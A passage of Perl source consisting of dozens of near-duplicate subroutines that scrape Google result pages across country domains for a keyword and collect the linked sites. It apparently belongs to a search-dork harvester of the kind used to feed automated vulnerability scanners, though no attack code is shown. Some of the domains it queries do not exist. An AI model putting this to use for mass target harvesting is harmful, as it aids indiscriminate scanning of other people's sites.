("http://www.google.si/search?q=".uri_escape($key)."&hl=&cr=countrySI&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSI/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCAT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cat/search?q=".uri_escape($key)."&hl=&cr=countryCAT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCAT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.bo/search?q=".uri_escape($key)."&hl=&cr=countryBO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleBO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ba/search?q=".uri_escape($key)."&hl=&cr=countryBA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleBA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.cr/search?q=".uri_escape($key)."&hl=&cr=countryCR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleHR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hr/search?q=".uri_escape($key)."&hl=&cr=countryHR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleHR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleEC() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.ec/search?q=".uri_escape($key)."&hl=&cr=countryEC&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleEC/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleFI() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.fi/search?q=".uri_escape($key)."&hl=&cr=countryFI&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleFI/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleHN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hn/search?q=".uri_escape($key)."&hl=&cr=countryHN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleHN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleHK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hk/search?q=".uri_escape($key)."&hl=&cr=countryHK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleHK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIS() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.is/search?q=".uri_escape($key)."&hl=&cr=countryIS&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIS/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleKZ() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.kz/search?q=".uri_escape($key)."&hl=&cr=countryKZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleKZ/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleKE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.ke/search?q=".uri_escape($key)."&hl=&cr=countryKE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleKE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleLV() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lv/search?q=".uri_escape($key)."&hl=&cr=countryLV&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleLV/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleLT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lt/search?q=".uri_escape($key)."&hl=&cr=countryLT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleLT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleLU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lu/search?q=".uri_escape($key)."&hl=&cr=countryLU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleLU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleMW() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mw/search?q=".uri_escape($key)."&hl=&cr=countryMW&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMW/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleMT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.mt/search?q=".uri_escape($key)."&hl=&cr=countryMT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleMA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ma/search?q=".uri_escape($key)."&hl=&cr=countryMA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleNP() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.np/search?q=".uri_escape($key)."&hl=&cr=countryNP&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNP/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pk/search?q=".uri_escape($key)."&hl=&cr=countryPK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pr/search?q=".uri_escape($key)."&hl=&cr=countryPR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleSA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.sa/search?q=".uri_escape($key)."&hl=&cr=countrySA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleSN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sn/search?q=".uri_escape($key)."&hl=&cr=countrySN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleSG() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.sg/search?q=".uri_escape($key)."&hl=&cr=countrySG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSG/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleSK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sk/search?q=".uri_escape($key)."&hl=&cr=countrySK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleVE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.ve/search?q=".uri_escape($key)."&hl=&cr=countryVE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleVE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleVN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.vn/search?q=".uri_escape($key)."&hl=&cr=countryVN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleVN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleuk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.uk/search?q=".uri_escape($key)."&hl=&cr=countryUK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleuk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlebr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.br/search?q=".uri_escape($key)."&hl=&cr=countryBR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlebr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlese() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.se/search?q=".uri_escape($key)."&hl=&cr=countrySE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlese/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlear() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ar/search?q=".uri_escape($key)."&hl=&cr=countryAR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlear/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleby() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.by/search?q=".uri_escape($key)."&hl=&cr=countryBY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleby/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleru() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ru/search?q=".uri_escape($key)."&hl=&cr=countryRU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleru/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleph() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ph/search?q=".uri_escape($key)."&hl=&cr=countryPH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleph/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlenet() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.net/search?q=".uri_escape($key)."&hl=&cr=countryNET&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlenet/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleca() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ca/search?q=".uri_escape($key)."&hl=&cr=countryCA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleca/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlees() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.es/search?q=".uri_escape($key)."&hl=&cr=countryES&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlees/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecom() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&hl=&cr=countryCOM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecom/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleit() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.it/search?q=".uri_escape($key)."&hl=&cr=countryIT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleit/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemx() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mx/search?q=".uri_escape($key)."&hl=&cr=countryMX&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemx/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecl() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cl/search?q=".uri_escape($key)."&hl=&cr=countryCL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecl/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlejp() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.jp/search?q=".uri_escape($key)."&hl=&cr=countryJP&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlejp/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlede() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.de/search?q=".uri_escape($key)."&hl=&cr=countryDE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlede/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleau() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.au/search?q=".uri_escape($key)."&hl=&cr=countryAU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleau/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlenl() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.nl/search?q=".uri_escape($key)."&hl=&cr=countryNL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlenl/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlero() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ro/search?q=".uri_escape($key)."&hl=&cr=countryRO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlero/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlefr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.fr/search?q=".uri_escape($key)."&hl=&cr=countryFR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlefr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cz/search?q=".uri_escape($key)."&hl=&cr=countryCZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googledk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.dk/search?q=".uri_escape($key)."&hl=&cr=countryDK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googledk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlebiz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.biz/search?q=".uri_escape($key)."&hl=&cr=countryBIZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlebiz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecat() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cat/search?q=".uri_escape($key)."&hl=&cr=countryCAT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecat/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleir() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ir/search?q=".uri_escape($key)."&hl=&cr=countryIR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleir/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlehk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hk/search?q=".uri_escape($key)."&hl=&cr=countryHK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlehk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleme() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.me/search?q=".uri_escape($key)."&hl=&cr=countryME&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleme/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleus() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.us/search?q=".uri_escape($key)."&hl=&cr=countryUS&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleus/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecn() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cn/search?q=".uri_escape($key)."&hl=&cr=countryCN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecn/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleve() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ve/search?q=".uri_escape($key)."&hl=&cr=countryVE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleve/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletw() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tw/search?q=".uri_escape($key)."&hl=&cr=countryTW&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletw/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleinfo() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.info/search?q=".uri_escape($key)."&hl=&cr=countryINFO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleinfo/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlekr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.kr/search?q=".uri_escape($key)."&hl=&cr=countryKR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlekr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleat() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.at/search?q=".uri_escape($key)."&hl=&cr=countryAT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleat/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlein() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.in/search?q=".uri_escape($key)."&hl=&cr=countryIN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlein/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemy() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.my/search?q=".uri_escape($key)."&hl=&cr=countryMY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemy/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sk/search?q=".uri_escape($key)."&hl=&cr=countrySK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleza() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.za/search?q=".uri_escape($key)."&hl=&cr=countryZA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleza/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.su/search?q=".uri_escape($key)."&hl=&cr=countrySU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tr/search?q=".uri_escape($key)."&hl=&cr=countryTR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleedu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.edu/search?q=".uri_escape($key)."&hl=&cr=countryEDU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleedu/){ my @grep = &links($link); 